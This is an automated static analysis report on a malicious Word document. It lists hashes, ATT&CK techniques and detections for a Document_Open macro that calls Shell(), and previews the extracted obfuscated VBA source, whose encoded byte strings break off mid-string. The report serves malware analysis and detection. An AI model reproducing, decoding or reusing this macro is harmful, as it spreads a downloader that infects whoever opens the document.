Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 08f9017c9e8d575c…

MALICIOUS

Office (OLE)

Size: 269.5 KB
Created: 2015-12-04 17:19:00
Authoring application: Microsoft Office Word
First seen: 2017-11-29
MD5: 4b2c4f7ceaf4298dc807cc8fb8f85021
SHA-1: f346717a5a209ed861e666fdb2cbe38d5b0815d1
SHA-256: 08f9017c9e8d575c3758a928ce62d176888ff02bca48ebeeeabaa5be4ead29c3
Risk Score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function. This indicates the macro is designed to execute arbitrary commands, likely to download and run a secondary payload. The ClamAV detection name 'Doc.Downloader.Adnel-6923089-0' further supports this downloader functionality.

Heuristics (6)

  • ClamAV: Doc.Downloader.Adnel-6923089-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Adnel-6923089-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ [In document text (OLE body)]
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# [In document text (OLE body)]
    • http://purl.org/dc/elements/1.1/ [In document text (OLE body)]
    • http://ns.adobe.com/xap/1.0/mm/ [In document text (OLE body)]
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# [In document text (OLE body)]
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# [In document text (OLE body)]
    • http://ns.adobe.com/photoshop/1.0/ [In document text (OLE body)]
    • http://www.iec.ch [In document text (OLE body)]
    • http://schemas.openxmlformats.org/drawingml/2006/main [In document text (OLE body)]

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 29679 bytes
SHA-256: 9017b7e1e3bd89ff38395a926abf83478203bc9f65f3c105947b344c27dec2f5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function Ejk5Vu0S Lib "TQCHzOGKIXucUU" Alias "Pw77c2kcB5XvrU" (ByVal TR2yFgtjh3 As String, UoduxdsIhnQ As Long) As Long
#Else
Private Declare Function Ejk5Vu0S lib "TQCHzOGKIXucUU" Alias "Pw77c2kcB5XvrU"(byval TR2yFgtjh3 as String, UoduxdsIhnQ as Long ) as Long
#End If
Sub IMH0m14q9wRdN()
K6mZEr2Tg78 = 56
If K6mZEr2Tg78 + IAdg > 1 Then
IAdg = 57 + 9 + 26 + 50
'4 C3PJsraGpX 41 2
End If
IAdg = 48 + 82
'32 82 5 C9Rxv
Dim WVPvuoDbPS As String, QxCMP99() As String, LWHmN1h7CQmG As Integer
F6sYXkHkBl4rZd = 3
If F6sYXkHkBl4rZd + Rwuw0WCmu9 > 1 Then
Rwuw0WCmu9 = 17 + 75 + 27 + 98
'30 ONipAFntkT 37 42
End If
Rwuw0WCmu9 = 26 + 74
'30 89 58 SQDEDZrtx
WVPvuoDbPS = WVPvuoDbPS & "242,170,218,224,216,215,33,22,102,103,68,22,26,64,75,21,68,53,112,0,3,123,29,76,5,27,60,66,65,0,110,25,41,93,121,119,31,117,102,28,88,55,44,85,32,48,98,61,67,122,119,114,99,10,6,38,92,104,116,96,7,112,115,116,53,120,109,82,80,59,70,77,117,8,15,97,27,115,91,92,49,75,79,20,99,24,126,14,25,120,96,89,116,53,68,8,7,73,64,34,124,23,4,116,109,56,105,121,97,57,125,73,44,119,4,110,21,7,82,61,116,36,41,125,32,124,119,60,142,236,142,157,241,184,219,148,206,138,188,142,163,205,165,159,229,222,175,195,211,138,185,240,237,129,201,137,240,199,204,199,160,200,212,165,223,189,130,223,133,157,255,244,242,144,189,213,131,198,137,227,193,229,243,238,179,201,168,178,135,242,131,249,161,194,223,239,213,168,164,198,171,209,134,191,246,210,139,236,171,249,201,210,163,130,213,180,198,198,240,231"
X7rZR = 17
If X7rZR + NK7Q75JnVO > 1 Then
NK7Q75JnVO = 28 + 43 + 23 + 83
'2 OiY46JvlHc1FHL10z 3 98
End If
NK7Q75JnVO = 9 + 53
'66 80 39 YhgDd6dg
WVPvuoDbPS = WVPvuoDbPS & ",143,173,161,206,144,249,216,190,145,208,186,248,150,212,254,238,143,245,162,141,157,230,224,201,177,145,218,190,252,225,61,42,68,100,93,78,98,37,116,92,61,120,72,30,125,85,77,66,31,19,41,70,37,11,92,3,8,30,83,46,17,51,47,121,41,17,196,224,203,234,212,182,111,110,60,119,38,101,86,31,15,10,16,22,1,99,116,116,28,29,56,29,123,57,16,71,121,22,8,104,67,51,126,62,81,106,111,9,109,44,24,46,28,94,48,78,23,6,96,42,95,53,53,42,91,33,6,100,7,42,21,99,5,116,36,84,37,58,74,8,122,4,9,6,50,108,117,34,124,19,26,69,53,8,31,28,75,58,40,64,63,69,61,98,21,44,33,46,18,89,78,120,98,53,32,127,25,71,123,124,99,112,67,38,21,111,52,6,31,102,104,108,124,70,146,196,166,137,175,240,241,202,207,179,206,185,238,237,132,217,156,201,149,183,136,158,247,170,242,248,233,231,145,159,173,190,129,225,177,211"
LeQwmu9 = 78
If LeQwmu9 + TROSWG > 1 Then
TROSWG = 45 + 44 + 20 + 93
'46 YpAQHWA1f34y8vt 88 13
End If
TROSWG = 40 + 5
'38 11 19 H7ePh3Wv3fI
WVPvuoDbPS = WVPvuoDbPS & ",196,208,142,242,230,210,172,245,130,241,168,147,145,184,146,239,173,226,139,248,253,242,216,142,138,172,182,212,157,184,162,153,205,207,207,246,238,143,238,155,130,194,187,225,199,221,130,247,243,171,245,133,211,136,251,158,247,209,220,252,216,145,246,243,168,224,133,187,186,183,237,139,239,236,150,227,216,245,151,175,160,172,246,149,255,249,24,49,24,33,59,29,71,49,4,0,127,122,12,94,85,94,44,45,31,30,124,125,123,9,113,11,88,110,16,73,54,69,28,39,61,20,223,90,30,95,52,73,33,21,89,48,111,1,114,99,46,21,11,78,69,29,75,114,56,73,43,67,25,60,0,22,22,8,52,75,69,40,74,50,103,87,43,112,1,108,55,14,18,61,21,106,46,111,4,121,41,7,69,26,24,81,80,72,105,21,32,77,110,101,90,58,43,52,95,69,106,87,51,83,85,5,5,98,98,12,112,76,70,47,126,118,110,102,22,123,77,16,4,11,79,52,4,111,34,37,1"
PMjzXgm7ca5rRt3RR = 4
If PMjzXgm7ca5rRt3RR + IKDPR9T > 1 Then
IKDPR9T = 14 + 84 + 97 + 12
'44 OchPrVWlDc3F 95 93
End If
IKDPR9T = 25 + 6
'11 94 43 RaJzH58qb
WVPvuoDbPS = WVPvuoDbPS & "16,15,13,106,16,121,61,109,0,42,50,60,104,25,16,111,28,100,88,225,231,164,211,218,216,181,253,216,172,197,128,214,246,128,134,182,211,135,243,133,246,254,178,152,130,193,202,186,197
... (truncated)